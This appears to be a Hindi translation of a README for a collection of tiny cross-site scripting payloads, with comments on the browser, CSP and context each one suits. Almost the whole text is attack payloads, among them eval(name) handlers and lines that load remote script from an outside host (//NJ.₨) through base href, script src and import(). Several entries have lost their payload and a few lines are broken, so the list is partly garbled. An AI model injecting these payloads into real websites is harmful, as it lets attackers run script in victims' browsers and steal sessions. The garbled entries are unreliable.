
विभिन्न संदर्भों में उपयोग किए जा सकने वाले छोटे XSS Payloads का संग्रह. https://tinyxss.terjanq.me
छोटे XSS पेलोड का एक संग्रह जो विभिन्न संदर्भों में उपयोग किए जा सकते हैं।
डेमो यहाँ उपलब्ध है: https://tinyxss.terjanq.me
<!-- सिंक के बाद DOM में एक सापेक्ष स्क्रिप्ट सम्मिलित करने की आवश्यकता है,
उदा. <base/href=//NJ.₨> ... <script src=/aaa></script> -->
<base/href=//NJ.₨>
<!-- केवल रिफ्लेक्टेड XSS के रूप में काम करता है -->
<svg/onload=eval(name)>
<!-- यदि आप URL को नियंत्रित करते हैं -->
<svg/onload=eval(`'`+URL)>
<!-- यदि आप नाम को नियंत्रित करते हैं, लेकिन unsafe-eval सक्षम नहीं है -->
<svg/onload=location=name>
<!-- क्रोम में, innerHTML के अंदर भी काम करता है, उन तत्वों पर भी जो अभी तक DOM में सम्मिलित नहीं हुए हैं -->
<svg><svg/onload=eval(name)>
<!-- यदि आप विंडो के नाम को नियंत्रित करते हैं, तो यह पेलोड innerHTML के अंदर काम करेगा, उन तत्वों पर भी जो अभी तक DOM में सम्मिलित नहीं हुए हैं -->
<audio/src/onerror=eval(name)>
<!-- यदि आप URL को नियंत्रित करते हैं, तो यह पेलोड innerHTML के अंदर काम करेगा, उन तत्वों पर भी जो अभी तक DOM में सम्मिलित नहीं हुए हैं -->
<!-- बस एक सामान्य स्क्रिप्ट -->
<script/src=//NJ.₨></script>
<!-- यदि आप विंडो का नाम नियंत्रित करते हैं -->
<!-- यदि आप URL को नियंत्रित करते हैं -->
<!-- यदि पृष्ठ पर iframes की संख्या स्थिर है -->
<!-- केवल फ़ायरफ़ॉक्स के लिए -->
<script/href=//NJ.₨ />">
<!-- यदि पृष्ठ पर iframes की संख्या यादृच्छिक है -->
<!-- यदि CSP में unsafe-inline अक्षम है और बाहरी स्क्रिप्ट की अनुमति है -->
</script>">
<!-- यदि इनलाइन स्टाइल की अनुमति है -->
<style/onload=eval(name)>
<!-- यदि इनलाइन स्टाइल की अनुमति है और URL को नियंत्रित किया जा सकता है -->
<style/onload=eval(`'`+URL)>
<!-- यदि इनलाइन स्टाइल अवरुद्ध हैं -->
<style/onerror=eval(name)>
<!-- बाहरी स्क्रिप्ट को आयात के रूप में उपयोग करता है, innerHTML में काम नहीं करता -->
<!-- PoC केवल https और क्रोम पर काम करता है, क्योंकि NJ.₨ Sec-Fetch-Dest हेडर की जाँच करता है -->
<svg/onload=import(/\\NJ.₨/)>
<!-- बाहरी स्क्रिप्ट को आयात के रूप में उपयोग करता है, यदि इनलाइन स्टाइल की अनुमति है तो ट्रिगर होता है -->
<!-- PoC केवल https और क्रोम पर काम करता है, क्योंकि NJ.₨ Sec-Fetch-Dest हेडर की जाँच करता है -->
<style/onload=import(/\\NJ.₨/)>
<!-- बाहरी स्क्रिप्ट को आयात के रूप में उपयोग करता है -->
<!-- PoC केवल https और क्रोम पर काम करता है, क्योंकि NJ.₨ Sec-Fetch-Dest हेडर की जाँच करता है -->
अप्रचलित:
<!-- यदि आप URL को नियंत्रित करते हैं, केवल Safari -->
<!-- यदि इनलाइन स्टाइल की अनुमति है, केवल Safari -->
<style/onload=write(URL)>